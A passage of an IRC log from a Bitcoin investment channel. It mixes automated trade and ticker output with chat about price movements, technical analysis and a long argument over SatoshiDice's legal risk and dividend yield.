0.00385001', '1000 @ 0.00380002'] Mar 24 19:18:49 smickles: Asks: ['4259 @ 0.00439999', '194974 @ 0.0044', '500 @ 0.00444437', '900 @ 0.0044444', '204 @ 0.00444442'] Mar 24 19:19:41 nah, mirrors. he should rather forbid the girls to call him "master" Mar 24 19:20:10 c'mon, that's just a healthy sexlive Mar 24 19:20:14 *life Mar 24 19:20:45 you do have healthy sex life, too? Mar 24 19:21:02 [HAVELOCK] [SDICE] 2 @ 0.53 = 1.06 BTC [+] Mar 24 19:22:01 yeah, but in another way. My wife's pregnant, so she's ready and willing most all the time Mar 24 19:23:00 pregnant again? sry if i misunderstand your family situation Mar 24 19:23:21 congrats in any case ;) Mar 24 19:23:31 heh, the process takes a while. She's due mid may Mar 24 19:23:45 thanks :) Mar 24 19:24:01 ic... she has no clock buffers, so you have to wait :) Mar 24 19:33:46 [MPEX] [S.MPOE] 5000 @ 0.00067508 = 3.3754 BTC [+] Mar 24 19:33:47 [MPEX] [S.MPOE] 8148 @ 0.00067509 = 5.5006 BTC [+] Mar 24 19:33:55 [MPEX] [S.MPOE] 1300 @ 0.00067969 = 0.8836 BTC [+] Mar 24 19:33:57 [MPEX] [S.MPOE] 819 @ 0.0006797 = 0.5567 BTC [+] Mar 24 19:34:10 S.MPOE, WAT UR DOIN Mar 24 19:34:28 lol prolly i miss bowjob Mar 24 19:46:27 ;;bc,stats Mar 24 19:46:29 Current Blocks: 227847 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 1976 blocks | Next Difficulty In About: 1 week, 2 days, 0 hours, 32 minutes, and 52 seconds | Next Difficulty Estimate: 7802484.10798 | Estimated Percent Change: 16.52758 Mar 24 19:46:34 blocks are raining Mar 24 19:49:30 <[\\\]> secure the network they said Mar 24 19:49:52 <[\\\]> asicminer div just got included in a block Mar 24 19:55:18 [MPEX] [O.BTCUSD.C730T] 3 @ 0.05191801 = 0.1558 BTC Mar 24 19:56:59 ;;calc 73/(1-.05191801) Mar 24 19:57:00 76.997560095 Mar 24 19:57:10 ;;ticker Mar 24 19:57:11 BTCUSD ticker | Best bid: 70.00000, Best ask: 70.70000, Bid-ask spread: 0.70000, Last trade: 70.70000, 24 hour volume: 50443.42134716, 24 hour low: 60.31012, 24 hour high: 70.80000, 24 hour vwap: 65.36583 Mar 24 20:01:05 [BTCTC] [ASICMINER-PT] 7 @ 0.75 = 5.25 BTC [-] Mar 24 20:01:21 [MPEX] [O.BTCUSD.C730T] 3 @ 0.05265701 = 0.158 BTC [+] Mar 24 20:01:30 [BTCTC] [ASICMINER-PT] 6 @ 0.8 = 4.8 BTC [+] Mar 24 20:03:56 [BTCTC] [ASICMINER-PT] 44 @ 0.8 = 35.2 BTC [+] Mar 24 20:05:20 <[\\\]> DeaDTerra, time to wake up and process ;) Mar 24 20:07:23 [MPEX] [O.BTCUSD.C730T] 3 @ 0.05265701 = 0.158 BTC [+] Mar 24 20:09:01 [HAVELOCK] [SDICE] 1 @ 0.516 BTC [-] Mar 24 20:09:27 $depth dice Mar 24 20:09:29 smickles: S.DICE Bids: ['2000 @ 0.004004', '352 @ 0.004', '1512 @ 0.0038512', '1000 @ 0.00385001', '1000 @ 0.00380002'] Mar 24 20:09:29 smickles: Asks: ['4259 @ 0.00439999', '194974 @ 0.0044', '500 @ 0.00444437', '900 @ 0.0044444', '204 @ 0.00444442'] Mar 24 20:09:52 quite a bit higher on havelock Mar 24 20:13:23 [MPEX] [O.BTCUSD.C730T] 2 @ 0.05090501 = 0.1018 BTC [-] Mar 24 20:13:42 has anyone seen rogue trader? Mar 24 20:13:55 rogue trader? Mar 24 20:14:37 "A rogue trader is an authorized employee making unauthorized trades on behalf of their employer." Mar 24 20:16:54 the movie with ewan mcgregor Mar 24 20:17:02 its an amazing trading movie Mar 24 20:18:00 market price on mt gox makes no sense to me..everything i know about markets tells me it should have been going down by now. i'm not an expert by anymeans however. Mar 24 20:18:18 what tells you it should be going down by now? Mar 24 20:18:35 maybe not go down..plateu? Mar 24 20:18:46 we are down from the high... Mar 24 20:18:54 barely Mar 24 20:18:55 decreased weekend volume means less liquidity Mar 24 20:19:01 higher spreads and more volatility Mar 24 20:19:22 we also had a big jump in difficulty Mar 24 20:19:33 that SHOULD tamp down on the supply flowing in Mar 24 20:19:51 which might raise it higer? Mar 24 20:19:52 think the miners were doing a block every 6-7 minutes Mar 24 20:20:00 that should go back to around 10 Mar 24 20:20:08 yes, lower supply from mining pools Mar 24 20:20:29 i'm just thinking out loud Mar 24 20:20:55 [MPEX] [O.BTCUSD.C730T] 2 @ 0.05469641 = 0.1094 BTC [+] Mar 24 20:20:57 i haven't really sold at all...but i have a price target that i want to hit by 2014 Mar 24 20:21:01 thanks ill take from that and try to grasp it Mar 24 20:21:43 in an efficient market, with a lot of liquidity, you would see the jump in difficulty priced in Mar 24 20:21:47 this aint a market like that Mar 24 20:22:24 KRS1: take a look at the charts on http://blockchained.com/ for the affect of diff changes on price Mar 24 20:22:31 signals are all weird... Mar 24 20:22:33 ok Mar 24 20:22:37 mjr_: downloading rogue trader Mar 24 20:22:37 because of inefficiencies Mar 24 20:22:46 for example Mar 24 20:22:49 which point to high volitility but overall health Mar 24 20:22:53 5500 accounts waiting to open ongox Mar 24 20:22:59 they aint going there to sell i bet Mar 24 20:23:25 coinbase seems to be quite fucked in fulfilling demand Mar 24 20:24:00 none of these mean that it HAS to go up...any guy who wants to buy himself a nice car could drop the price signifigantly Mar 24 20:24:20 this is a great link thanks smickles Mar 24 20:24:40 speaking of which, anyone seen the 6 wheel mercedes g-wagon? Mar 24 20:24:41 np Mar 24 20:25:08 [MPEX] [O.BTCUSD.C730T] 2 @ 0.05283951 = 0.1057 BTC [-] Mar 24 20:25:36 http://www.youtube.com/watch?v=Z39jXZfCpf0 Mar 24 20:27:48 only a few military grade trucks could outperform you...and they wouldn't look as cool :) Mar 24 20:31:13 [MPEX] [O.BTCUSD.C730T] 2 @ 0.05197551 = 0.104 BTC [-] Mar 24 20:32:07 jeez, that thing tears the fuck out of the land Mar 24 20:34:02 [HAVELOCK] [VTX] 1 @ 0.7448 BTC [-] Mar 24 20:35:01 [HAVELOCK] [VTX] 1 @ 0.7448 BTC [-] Mar 24 20:35:05 [BTCTC] [ASICMINER-PT] 1 @ 0.8 BTC [+] Mar 24 20:35:08 [BTCTC] [ASICMINER-PT] 1 @ 0.8 BTC [+] Mar 24 20:35:09 [BTCTC] [ASICMINER-PT] 1 @ 0.8 BTC [+] Mar 24 20:35:12 [BTCTC] [ASICMINER-PT] 57 @ 0.8 = 45.6 BTC [+] Mar 24 20:37:16 [MPEX] [O.BTCUSD.C730T] 2 @ 0.05197551 = 0.104 BTC [-] Mar 24 20:43:17 [MPEX] [O.BTCUSD.C730T] 2 @ 0.05419401 = 0.1084 BTC [+] Mar 24 20:44:01 [HAVELOCK] [VTX] 13 @ 0.7448 = 9.6824 BTC [-] Mar 24 20:45:06 http://www.reddit.com/r/Bitcoin/comments/1ax8zi/say_what_you_want_but_technicals_work/ << funny Mar 24 20:46:02 see my refutation using actual studies to back it up Mar 24 20:47:25 smickles: yeah, it is a beast of a truck Mar 24 20:48:08 and yeah, you can retrofit any theory to back up your chart patterns...at the beginning of a "head and shoulders" very few can successfully call the head and shoulders...you see it after it has happened Mar 24 20:48:15 i mean that guy not you by the way Mar 24 20:49:20 [MPEX] [O.BTCUSD.C730T] 1 @ 0.05419401 BTC [+] Mar 24 20:49:42 mjr_: where you around back when someone claimed to have spotted a head and shoulders int the btc/usd price a while ago? it became a small meme when someone else colored it like batman Mar 24 20:50:09 [BTCTC] [S.DICE-PT] 48 @ 0.00384 = 0.1843 BTC [+] Mar 24 20:50:11 [BTCTC] [S.DICE-PT] 31 @ 0.00384 = 0.119 BTC [+] Mar 24 20:51:00 [BTCTC] [S.DICE-PT] 100 @ 0.00385 = 0.385 BTC [+] Mar 24 20:51:02 [BTCTC] [S.DICE-PT] 500 @ 0.00383 = 1.915 BTC [-] Mar 24 20:51:21 [BTCTC] [ASICMINER-PT] 3 @ 0.8395 = 2.5185 BTC [+] Mar 24 20:52:25 haven't seen many head and shoulders but cup and handle has been going around a lot Mar 24 20:52:28 bear traps Mar 24 20:52:29 etc Mar 24 20:53:02 simple point is that just cuz it did that .5 seconds ago, means jack shit to what it does in the next .5 seconds...especially when you have such a small sample size Mar 24 20:53:24 how does a chart possibly tell me someone is going to unload a half a mill cuz they decided to buy a house Mar 24 20:53:43 only a handful of really big traders Mar 24 20:53:51 and they can move the price dollars up or down Mar 24 20:54:11 but not only is there volatility...its also volatility of volume and size Mar 24 20:55:28 [MPEX] [O.BTCUSD.C730T] 1 @ 0.05418651 BTC [-] Mar 24 20:55:58 tiberius back in action? Mar 24 20:56:21 ;;ticker Mar 24 20:56:22 BTCUSD ticker | Best bid: 70.59701, Best ask: 70.98000, Bid-ask spread: 0.38299, Last trade: 70.98000, 24 hour volume: 46477.06384271, 24 hour low: 60.37000, 24 hour high: 71.43825, 24 hour vwap: 66.26052 Mar 24 20:56:24 llestimate Mar 24 20:56:27 ;;estimate Mar 24 20:56:28 Next difficulty estimate | 7882079.03307 based on data since last change | 7826894.02138 based on data for last three days Mar 24 20:57:01 https://bitcointalk.org/index.php?topic=56025.msg666745#msg666745 << this is one of them mjr_ Mar 24 20:57:06 scary batman double top Mar 24 20:57:23 at 4.5 Mar 24 21:01:27 [MPEX] [O.BTCUSD.C730T] 1 @ 0.05401701 BTC [-] Mar 24 21:01:43 lol Mar 24 21:01:48 smickles: thanks Mar 24 21:02:00 [HAVELOCK] [SDICE] 1 @ 0.516 BTC [-] Mar 24 21:02:06 ThickAsThieves: those estimates won't mean anything till we get a bigger sample size Mar 24 21:02:31 smickles: here is something funny to watch though Mar 24 21:03:25 just checkin Mar 24 21:04:27 can someone buy me a steam game Mar 24 21:06:04 http://youtu.be/xWpOKWjFHNY?t=1m5s Mar 24 21:06:23 easy way to make a shit ton of money if you caught that bottom... Mar 24 21:06:40 especially if you were leveraged 5 to 1 on bitfinex Mar 24 21:07:28 [MPEX] [O.BTCUSD.C730T] 1 @ 0.05401701 BTC [-] Mar 24 21:07:51 [MPEX] [S.MPOE] 1300 @ 0.00067563 = 0.8783 BTC [-] Mar 24 21:07:53 [MPEX] [S.MPOE] 4200 @ 0.00067564 = 2.8377 BTC [+] Mar 24 21:07:54 anyone? Mar 24 21:08:36 i can sell you a code for Bioshock Infinity & Crysis 3 Mar 24 21:08:45 (late response to smickles) Mar 24 21:08:48 heh, mjr_ fun stuff Mar 24 21:09:01 ;;seen smickles Mar 24 21:09:01 smickles was last seen in #bitcoin-assets 12 seconds ago: heh, mjr_ fun stuff Mar 24 21:09:03 this won't last Mar 24 21:09:08 but damn it is fun to watch Mar 24 21:09:20 bunch of people working on bringing more efficiency to the market Mar 24 21:09:26 ThickAsThieves: could you gift me Kerbel Space Program Mar 24 21:09:37 we'll be telling young kids in years about when it used to jump ten points Mar 24 21:09:47 from 55 to 65... Mar 24 21:09:59 they'll be like "it used to be 65???" Mar 24 21:10:02 mjr_: also, i caught that. and it reminded me of the video of the guy who recorded the crash from 30 to 0 which was eventually rolled back due to it being caused by a hack Mar 24 21:10:46 and i think bugpowder said he missed the bottom by .20 usd Mar 24 21:11:51 but how long was his fiat sitting there waiting for that lost opportunity Mar 24 21:12:02 maybe since btc was at $50? Mar 24 21:12:36 ThickAsThieves: mine? or BP's? Mar 24 21:12:41 BP Mar 24 21:12:53 dunno, I'd bet not long tho Mar 24 21:13:02 cavirtex shares have almost doubled Mar 24 21:13:07 just addressing that things have to dip pretty damn low to be worth the risk of sitting on fiat Mar 24 21:13:08 BP is a smart chap Mar 24 21:13:29 [MPEX] [O.BTCUSD.C730T] 1 @ 0.05061551 BTC [-] Mar 24 21:14:35 yep VTX is on fire Mar 24 21:15:12 well his IPO had a fair valuation imo $3mil market cap for entire company Mar 24 21:15:32 guy wasnt being greedy Mar 24 21:15:47 maybe not, but still plenty risk there Mar 24 21:15:58 how? Mar 24 21:16:09 ;;seen thestringpuller Mar 24 21:16:09 thestringpuller was last seen in #bitcoin-assets 6 minutes and 42 seconds ago: ThickAsThieves: could you gift me Kerbel Space Program Mar 24 21:16:32 unlike most other btc firms hes a fully incorporated company Mar 24 21:16:56 i'll skip to you telling me how there's not as much risk as one might think Mar 24 21:17:47 thickasthieves: cavirtex has better transparency then anything out there so far imo, his statements have to be audited by multiple 3rd parties Mar 24 21:18:03 [BTCTC] [ASICMINER-PT] 2 @ 0.83945 = 1.6789 BTC [-] Mar 24 21:18:14 doesnt mean theyll turn a profit Mar 24 21:18:20 they already do Mar 24 21:18:27 and a major one at that Mar 24 21:18:34 they have 0 profit to date Mar 24 21:18:46 look at his trade volume Mar 24 21:18:51 and fee % Mar 24 21:19:18 how do they have 0 profit when hes collecting 2-3% off of $150k a day? Mar 24 21:19:31 um... Mar 24 21:19:35 expenses? Mar 24 21:19:41 i don't know their profit Mar 24 21:19:42 running a server? Mar 24 21:19:52 but that is how you would turn that revenue not into profit Mar 24 21:20:02 those 3rd party audits aren't free you know Mar 24 21:20:09 i have no clue about cavirtex Mar 24 21:20:09 ca virtex traded $800k in the last week Mar 24 21:20:13 i own no shares Mar 24 21:20:19 and haven't looked into them Mar 24 21:20:21 collecting at least 2% of that for themselves Mar 24 21:20:28 no clue Mar 24 21:20:34 but i'm sure they will do well Mar 24 21:20:44 i am just not interested in gaining on appreciation Mar 24 21:20:47 nobody else cashes out as fast as they do so far in north america Mar 24 21:20:50 revenue streams only ATM Mar 24 21:21:06 mjr_ dividends you mean Mar 24 21:21:08 [MPEX] [O.BTCUSD.C750T] 1 @ 0.05003501 BTC [+] Mar 24 21:21:10 [MPEX] [O.BTCUSD.C730T] 1 @ 0.05003501 BTC [-] Mar 24 21:21:11 yep Mar 24 21:21:14 the prob for my model Mar 24 21:21:20 is that if i believe in the company Mar 24 21:21:20 mjr_ they will pay dividends out. Mar 24 21:21:22 i don't want to sell Mar 24 21:21:29 "To date all revenues have been used for business and website development, legal fees, computer hardware and marketing. All available capital is being used to grow the company and complete the business plan items." Mar 24 21:21:32 no...they have absolutely no promise of dividends Mar 24 21:21:46 thickasthieves: yes because volumes have increased only in the last 3months Mar 24 21:21:49 "In the case where VirtEx is bought out by another company or VirtEx pays a dividend to its shareholders, Bitcoin shareholders will get paid in Bitcoin at the Canadian dollar equivalent rate using the best market prices at the time" Mar 24 21:21:59 satoshi dice "we will pay 100% of profit as dividends" Mar 24 21:22:10 yes because its an illegal gambling site. Mar 24 21:22:13 in the case that aliens land on earth... Mar 24 21:22:16 of course it will have the highest payouts Mar 24 21:22:23 first off Mar 24 21:22:29 is it illegal? Mar 24 21:22:29 maybe illegal in america Mar 24 21:22:34 that aint the whole world Mar 24 21:22:37 second of all Mar 24 21:22:40 satoshi dice has a 30% dividend yield for a reason Mar 24 21:22:41 [MPEX] [S.MPOE] 6100 @ 0.00067564 = 4.1214 BTC [+] Mar 24 21:22:42 [MPEX] [S.MPOE] 5000 @ 0.00068174 = 3.4087 BTC [+] Mar 24 21:22:50 [MPEX] [S.MPOE] 3198 @ 0.00068175 = 2.1802 BTC [+] Mar 24 21:22:50 it implies major risk of an event occuring Mar 24 21:22:50 that is only if bitcoins are regulated in gambling, which no one has said they are so far Mar 24 21:22:59 in ireland? Mar 24 21:23:06 mjr: the market is saying satoshi dice is risky Mar 24 21:23:12 no Mar 24 21:23:17 hence why it has a 30% dividend yield. Mar 24 21:23:21 by the market, do you mean mtgox? Mar 24 21:23:23 ;) Mar 24 21:23:27 they are simply passing through most of THEIR profits to most of their stakeholders Mar 24 21:23:35 yes and everyone would BID THEM UP Mar 24 21:23:38 wanting those profits Mar 24 21:23:40 ie. the 87% of the company which they own Mar 24 21:23:44 and the dividend yield would be in the single digits. Mar 24 21:23:56 the reason its not is because satoshi dice has a huge event risk Mar 24 21:23:57 div is 0 this month Mar 24 21:24:02 [MPEX] [S.MPOE] 1 @ 0.00068175 BTC [+] Mar 24 21:24:04 eh Mar 24 21:24:06 1) voorhees is in the US Mar 24 21:24:12 for now Mar 24 21:24:16 and that is a very small window Mar 24 21:24:17 [MPEX] [S.MPOE] 2 @ 0.00068175 = 0.0014 BTC [+] Mar 24 21:24:18 2) hes also a memeber of the "cash in" service bitinstant Mar 24 21:24:18 of risk Mar 24 21:24:26 actually he is at coinapult Mar 24 21:24:27 its not a small window Mar 24 21:24:29 but keep going Mar 24 21:24:37 hes a member of bitinstant as well Mar 24 21:24:59 mjr: i dont have to keep going, the market is indicating a 30% dividend for a reason, if it was safe the price of satoshi would be 2-3x what it is now. Mar 24 21:25:11 because even a 10% annual dividend in BTC is alot Mar 24 21:25:53 mjr_: second off it doesnt matter if satoshidice is in ireland, they have no gaming license to make them legal in ANY jurisdiction. Mar 24 21:25:53 well Mar 24 21:25:59 huh? Mar 24 21:26:10 under what license are you allowed to buy milk? Mar 24 21:26:11 the gambling friendly regions require a license. Mar 24 21:26:23 unless there is legislation STOPPING you Mar 24 21:26:26 the farmer is licensed to sell it to me Mar 24 21:26:28 it is implicityly legal Mar 24 21:26:32 wrong Mar 24 21:26:36 and ireland doesn't have that Mar 24 21:26:39 [MPEX] [O.BTCUSD.C730T] 10 @ 0.05003501 = 0.5004 BTC [-] Mar 24 21:26:42 which is why all the other gambling sites are there too Mar 24 21:26:48 no they arent Mar 24 21:26:51 ie. dollar online poker Mar 24 21:26:54 they are on small islands fully licensed Mar 24 21:26:58 like winpoker for example Mar 24 21:27:21 gaming jurisdictions provide licenses to firms Mar 24 21:27:41 [MPEX] [O.BTCUSD.C750T] 1 @ 0.05003501 BTC [+] Mar 24 21:27:42 [MPEX] [O.BTCUSD.C730T] 1 @ 0.05003501 BTC [-] Mar 24 21:28:26 http://www.justice.ie/en/JELR/Casino%20%28Eng%29%20for%20Web.pdf/Files/Casino%20%28Eng%29%20for%20Web.pdf Mar 24 21:28:36 gaming is 100% regulated in ireland. requiring licenses Mar 24 21:28:39 of which satoshidice has none Mar 24 21:28:43 would be nice to see some development or promotion for sdice again Mar 24 21:28:50 well, that is happening Mar 24 21:28:54 i trust Mar 24 21:29:00 [HAVELOCK] [SDICE] 4 @ 0.516 = 2.064 BTC [-] Mar 24 21:29:41 thickasthieves: imo if their wasnt so much uncertainty with sdice its price would be 2-3x higher Mar 24 21:29:41 i have a lot of faith in the long term prospects of that company Mar 24 21:29:54 the bigger they get the larger the target on them Mar 24 21:29:58 you don't get half of the volume by not being popular Mar 24 21:30:01 especially when key executives are inside the US. Mar 24 21:30:12 breaking numerous US laws in the process Mar 24 21:30:13 which they won't be for even 4 weeks Mar 24 21:30:15 i believe Mar 24 21:30:29 not sure the exact time frame Mar 24 21:30:33 but i think it is already well known Mar 24 21:30:37 voorhees should have never been a memeber of the cash in service as well Mar 24 21:30:40 that they will not be here very much longer Mar 24 21:30:50 because as far as US authorities are concerned, he is selling casino chips Mar 24 21:31:03 thats nice Mar 24 21:31:16 they have done at this point...oh yeah nothing Mar 24 21:31:25 becuase it was small. Mar 24 21:31:29 ok... Mar 24 21:31:31 nobody knew about it Mar 24 21:31:32 and they won't be here Mar 24 21:31:34 so... Mar 24 21:31:37 no servers in us Mar 24 21:31:40 no employees in us Mar 24 21:31:42 it doesnt matter his name is everywhere and he is a US citizen Mar 24 21:31:44 but the us will... Mar 24 21:31:55 and he has no gaming license in any jurisdiction even ireland Mar 24 21:32:06 so you are now worried about ireland stepping in Mar 24 21:32:17 i'll take my chances i suppose Mar 24 21:32:20 the us can Mar 24 21:32:22 if satoshi dice was double in price the dividend yield would be 15% Mar 24 21:32:24 different risk profiles and we can leave it at that Mar 24 21:32:24 freeze your fiat-denominated assets Mar 24 21:32:26 which is still VERY high Mar 24 21:32:30 take your property Mar 24 21:32:34 and lock you in a room Mar 24 21:32:38 um...there are no fiat denominated assets Mar 24 21:32:45 all of s.dice is in btc Mar 24 21:33:00 not necessarily true of the humans behind it Mar 24 21:33:00 expenses paid in btc Mar 24 21:33:11 operating an illegal casino is still a massive fine/punishment even in ireland. Mar 24 21:33:12 hold on... Mar 24 21:33:15 please read the laws before you spout BS Mar 24 21:33:29 usg doesn't care about laws or your mythical currencies Mar 24 21:33:31 ireland is a member of the EU Mar 24 21:33:43 they just lock you up and make an example of you Mar 24 21:33:44 its not the wildwest like carribean islands Mar 24 21:33:44 again, that's nice Mar 24 21:33:50 exactly Mar 24 21:33:51 lock up the server? Mar 24 21:33:58 you are cashing chips for a casino Mar 24 21:33:58 nope, the humans who can log into the server. Mar 24 21:34:00 remember...only the server is in ireland Mar 24 21:34:09 there is nothing in the US to lock up Mar 24 21:34:10 lock up the people operating it Mar 24 21:34:11 < tiberiusiv> yes because its an illegal gambling site. <<< iirc, it's a legal irish gaming company Mar 24 21:34:13 not even humans? Mar 24 21:34:19 nope Mar 24 21:34:22 just a server Mar 24 21:34:23 mjr: the US government can seize the server in ireland. Mar 24 21:34:28 [MPEX] [O.BTCUSD.C750T] 1 @ 0.05144351 BTC [+] Mar 24 21:34:30 hold on wait Mar 24 21:34:30 [MPEX] [O.BTCUSD.C730T] 1 @ 0.05144351 BTC [+] Mar 24 21:34:38 and any stockholder they can track down they can arguably nail to the wall Mar 24 21:34:39 we have jurisdiction to seize irish property now? Mar 24 21:34:42 the same way they took megaupload Mar 24 21:34:48 "jurisdiction" Mar 24 21:34:48 yeah Mar 24 21:34:50 lol Mar 24 21:34:52 smickles: they are licensed in ireland? Mar 24 21:34:53 kim dotcom is so screwed right now Mar 24 21:34:58 i hate getting off scott free Mar 24 21:35:05 mjr: European union has agreements with the US. Mar 24 21:35:07 and having lots of money Mar 24 21:35:18 julian assange...free Mar 24 21:35:19 mjr: the business was shutdown Mar 24 21:35:23 thats what matters he still lost tens of millions Mar 24 21:35:24 kim dotcom...free Mar 24 21:35:29 pirate bay...freee Mar 24 21:35:35 hmmm who's been locked up Mar 24 21:35:38 mjr: his assets werent unfrozen, and he losts tens of millions Mar 24 21:35:46 his assets are in bitcoins Mar 24 21:35:51 being a prisoner in a embassy is being free? Mar 24 21:35:55 iirc you can't freeze a bitcoin account Mar 24 21:35:57 the point is satoshi dice stock can collapse to 0 in 1 day Mar 24 21:36:13 i disagree Mar 24 21:36:13 but you can shut the business down Mar 24 21:36:20 i don't think you can Mar 24 21:36:21 collapsing YOUR equity Mar 24 21:36:24 there are hosts all over the world Mar 24 21:36:29 and its just a server Mar 24 21:36:30 the market doesnt. Mar 24 21:36:35 hence the high dividend yield Mar 24 21:36:49 high dividend yield = uncertainty about future profits Mar 24 21:36:56 ok, to clarify...i think that the risk that the tin foil hat wearers see is overblwon Mar 24 21:37:05 hence making this stock extremely undervalued Mar 24 21:37:10 tiberiusiv: ireland requires a license to play games? Mar 24 21:37:30 now obviously, the drones are just one step away right tiberiusiv? Mar 24 21:37:34 a game of monopoly must fucking suck to get started Mar 24 21:37:42 smickles: all legal gaming jurisdictions require the provider to obtain gaming licenses Mar 24 21:38:05 tiberiusiv: and what does it require to let me download music for free? who licenses that? Mar 24 21:38:12 smickles: BTC can be defined as equivalent to casino chips. Mar 24 21:38:17 the govt is not all powerful you know Mar 24 21:38:30 it would take less then 30seconds to prove BTC are exchangable for fiat Mar 24 21:38:40 tiberiusiv: you mean gambling, right? from what i've read, the lawyers over there see playing satoshi dice with bitcoin as a game, not gambling Mar 24 21:38:41 mjr: well you are breaking the law anonymously Mar 24 21:38:48 satoshidice is breaking many laws with its owners publicly exposed Mar 24 21:38:50 i find it hilarious, that the same people who usually decry the inefficiences of govt then when convenient say that they can literally do anything they put their mind to Mar 24 21:38:54 big difference. Mar 24 21:39:14 smickesL: you dont understand terminology do you? gaming = gambling in what i am referencing... Mar 24 21:39:31 mjr: if satoshidice future was more certain, the price would reflect it, it doesnt. Mar 24 21:39:32 they can't run healthcare...but they could prob insert a chip into every american Mar 24 21:39:37 i agree Mar 24 21:39:44 tiberiusiv: i totally agree Mar 24 21:39:59 tiberiusiv: yeah, but they see the difference between gambling and playing poker with zynga credits Mar 24 21:40:10 the point of investing, iirc, is to try to play on inefficiences, if everyone knew what it was worth...it owuldn't make sense to buy it for more Mar 24 21:40:15 and the price would be frozen Mar 24 21:40:23 zynga credits arent easily convertible Mar 24 21:40:24 and they see playing sd with bitcoin in the category of zynga poker with zynga credits Mar 24 21:40:43 mjr: not true, when you buy on the secondary market someone is betting against you by selling to you. Mar 24 21:40:54 last i knew, zynga didn't need to comply with gambling laws Mar 24 21:40:54 yes, and the market proves us right or wrong Mar 24 21:41:00 you only truely "invest" by buying on primary market ie an ipo to raise capital for a firm Mar 24 21:41:06 which i did Mar 24 21:41:14 i have bought on secondary and primary market Mar 24 21:41:20 for sdice Mar 24 21:41:33 smickes: bitcoin is not in the category of zynga credits. Mar 24 21:41:48 tiberiusiv: per what irish ruling? Mar 24 21:41:49 zynga credits cannot be cashed in and out for dollars Mar 24 21:41:51 tiberiusiv: the ECB seemd to think it was Mar 24 21:42:03 mjr: probably if satoshidice obtains a real gaming license the price will double or tripple Mar 24 21:42:18 tiberiusiv: that is the point Mar 24 21:42:33 tiberiusiv: similar to investing in med company hoping for drug approval Mar 24 21:42:49 tiberiusiv: or new product lines which are as yet unknown Mar 24 21:42:50 mjr_: ireland has GAMBLING licenses that you need. Mar 24 21:43:31 tiberiusiv: i think we are on the same page...they are cheap now, but i expect them to become expensive Mar 24 21:43:40 tiberiusiv: so i buy them now...instead of when they are expensive Mar 24 21:43:43 [MPEX] [S.MPOE] 6188 @ 0.00066482 = 4.1139 BTC [-] Mar 24 21:43:44 [MPEX] [S.MPOE] 1300 @ 0.00065585 = 0.8526 BTC [-] Mar 24 21:43:45 [MPEX] [S.MPOE] 4712 @ 0.00065584 = 3.0903 BTC [-] Mar 24 21:43:45 tiberiusiv: taking on risk Mar 24 21:43:52 i dont Mar 24 21:43:53 tiberiusiv: in exchange for higher return Mar 24 21:43:54 i think they launched in ireland because, if in the future what they are doing is legally considered gambling, they can get a license Mar 24 21:44:13 currently, legally, from what their lawyers think, it's not gambling Mar 24 21:44:24 as long as satoshidice managers are openly operating an illegal casino while having a cashin service in the United states, and a presence in the united states satoshidice is not cheap Mar 24 21:44:47 they should have stayed anonymous. Mar 24 21:44:54 tiberiusiv: AWESOME! that means in less than four weeks their price should skyrocket Mar 24 21:44:57 [BTCTC] [GSDPT] 1 @ 0.00401 BTC [-] Mar 24 21:44:59 [BTCTC] [GSDPT] 61 @ 0.004 = 0.244 BTC [-] Mar 24 21:45:24 tiberiusiv: since as i've said...their won't be anybody in the US Mar 24 21:45:31 satoshidice would have been 2-3x imo if the managers stayed fully anonymous Mar 24 21:45:42 it wont matter. Mar 24 21:45:48 lol ok Mar 24 21:45:52 i was going off your points Mar 24 21:46:03 the operators are known to authorities at this point Mar 24 21:46:13 especially since they openly bragged about the profits a few months ago too Mar 24 21:46:13 as long as satoshidice managers are openly operating an illegal casino while having a cashin service in the United states, and a presence in the united states satoshidice is not cheap Mar 24 21:46:35 mjr: the cashin service is not leaving. Mar 24 21:46:43 and they will not be a part of that Mar 24 21:46:44 80%+ of satoshidice players are US residents Mar 24 21:46:48 from what i understand they aren't now Mar 24 21:46:56 and who cares about the players again? Mar 24 21:47:13 they can't shut down people playing, we already established that Mar 24 21:47:14 [MPEX] [O.BTCUSD.C750T] 1 @ 0.05303651 BTC [+] Mar 24 21:47:18 the point is voorhees is operating the "cashier" and the gaming table with his NAME on it. Mar 24 21:47:18 it uses the blockchain Mar 24 21:47:23 if they could bitcoin is done anyway Mar 24 21:47:32 hmmm...check out bitinstant Mar 24 21:47:54 bitinstant allows some american to walk into walmart and fund his sdice Mar 24 21:48:17 ok Mar 24 21:48:19 Erik Voorhees' Experience Mar 24 21:48:19 Director of Marketing and Communications Mar 24 21:48:19 BitInstant Mar 24 21:48:24 so shut down walmart? Mar 24 21:48:28 he does marketing Mar 24 21:48:28 his name is on BOTH sdice and the cash in service. Mar 24 21:48:36 it doesnt matter hes asking for trouble Mar 24 21:48:41 especially in the united states Mar 24 21:48:47 whatever Mar 24 21:48:51 i'm tired of this Mar 24 21:48:56 i'll bet on them Mar 24 21:48:58 you bet against Mar 24 21:49:01 and the market price of sdice reflects those concerns Mar 24 21:49:03 i would even lend you my shares to short Mar 24 21:49:17 so i could make more money off FUD Mar 24 21:49:28 we will see in 6months Mar 24 21:49:38 yes we will Mar 24 21:50:07 and your comment about kim dotcom, sure hes free but his business is destroyed. Mar 24 21:50:07 i would love the price to fall a bit more Mar 24 21:50:17 yeah, mega is done for sure Mar 24 21:50:26 so equity value is 0. Mar 24 21:50:26 oh wait... Mar 24 21:50:34 megaupload is done Mar 24 21:50:37 mega just started Mar 24 21:50:39 what happened to Mega? Mar 24 21:50:41 can't keep a good man down i guess Mar 24 21:50:49 hell never repeat Mar 24 21:50:53 especially in NZ or anywhere else in the world Mar 24 21:50:55 if you say so Mar 24 21:51:11 change your nick to doom_and_gloom_FUD Mar 24 21:51:16 [BTCTC] [PAJKA.BOND] 1 @ 0.107 BTC [-] Mar 24 21:51:18 [BTCTC] [PAJKA.BOND] 1 @ 0.1052 BTC [-] Mar 24 21:51:21 [BTCTC] [PAJKA.BOND] 1 @ 0.1051 BTC [-] Mar 24 21:51:23 [BTCTC] [PAJKA.BOND] 1 @ 0.1051 BTC [-] Mar 24 21:51:26 [BTCTC] [PAJKA.BOND] 1 @ 0.105 BTC [-] Mar 24 21:51:26 if you remember what warren buffet said... Mar 24 21:51:28 no im being realistic in a world dominated by government. Mar 24 21:51:28 [BTCTC] [PAJKA.BOND] 2 @ 0.102 = 0.204 BTC [-] Mar 24 21:51:33 what should i do when people are being fearful? Mar 24 21:51:37 [BTCTC] [PAJKA.BOND] 4 @ 0.101 = 